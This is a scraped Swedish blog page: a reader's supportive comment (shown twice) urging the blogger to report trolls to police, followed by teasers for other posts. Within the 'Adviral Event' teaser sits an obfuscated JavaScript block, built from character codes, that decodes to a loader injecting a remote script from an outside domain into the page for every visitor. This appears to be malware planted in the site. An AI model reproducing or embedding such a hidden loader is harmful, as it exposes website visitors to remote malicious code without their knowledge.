  Det är bra att du polisanmäler, trollen måste ta konsekvenserna av sitt beteende. Eftersom de tydligen inte förstår hur sunda, normala människor är mot andra så måste vi alla tillsammans visa vad som är rätt och sjysst. Man ska aldrig, aldrig ta skit från någon, hur jobbigt det än är så måste man stå upp emot elakheter och påhopp.
  Jag tror som några redan skrivit att avundsjuka och missunnsamhet har en stor del i det som skvallras och skrivs. Du är ung, vacker, företagsam och kämpar på vad som än händer. Det sticker i ögonen på de som kanske inte är lika driftiga och glassar runt en hel del. De bloggbesökare som skriver taskiga kommentarer har förmodligen så trista och tragiska liv att de absolut måste förpesta tillvaron för dig bara för att må bättre själva.
  Är så glad för din skull att det börjar ordna upp sig med saker och ting, att det går åt rätt håll. Du är stark, stolt och självständig som få.
  Det finns så mycket kvar att upptäcka av livet för dig och Lilleman, önskar er allt gott! Kram från en liten tant som numer bojkottar vissa bloggar

 78. Hej My!
  Det är bra att du polisanmäler, trollen måste ta konsekvenserna av sitt beteende. Eftersom de tydligen inte förstår hur sunda, normala människor är mot andra så måste vi alla tillsammans visa vad som är rätt och sjysst. Man ska aldrig, aldrig ta skit från någon, hur jobbigt det än är så måste man stå upp emot elakheter och påhopp.
  Jag tror som några redan skrivit att avundsjuka och missunnsamhet har en stor del i det som skvallras och skrivs. Du är ung, vacker, företagsam och kämpar på vad som än händer. Det sticker i ögonen på de som kanske inte är lika driftiga och glassar runt en hel del. De bloggbesökare som skriver taskiga kommentarer har förmodligen så trista och tragiska liv att de absolut måste förpesta tillvaron för dig bara för att må bättre själva.
  Är så glad för din skull att det börjar ordna upp sig med saker och ting, att det går åt rätt håll. Du är stark, stolt och självständig som få.
  Det finns så mycket kvar att upptäcka av livet för dig och Lilleman, önskar er allt gott! Kram från en liten tant som numer bojkottar vissa bloggar

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/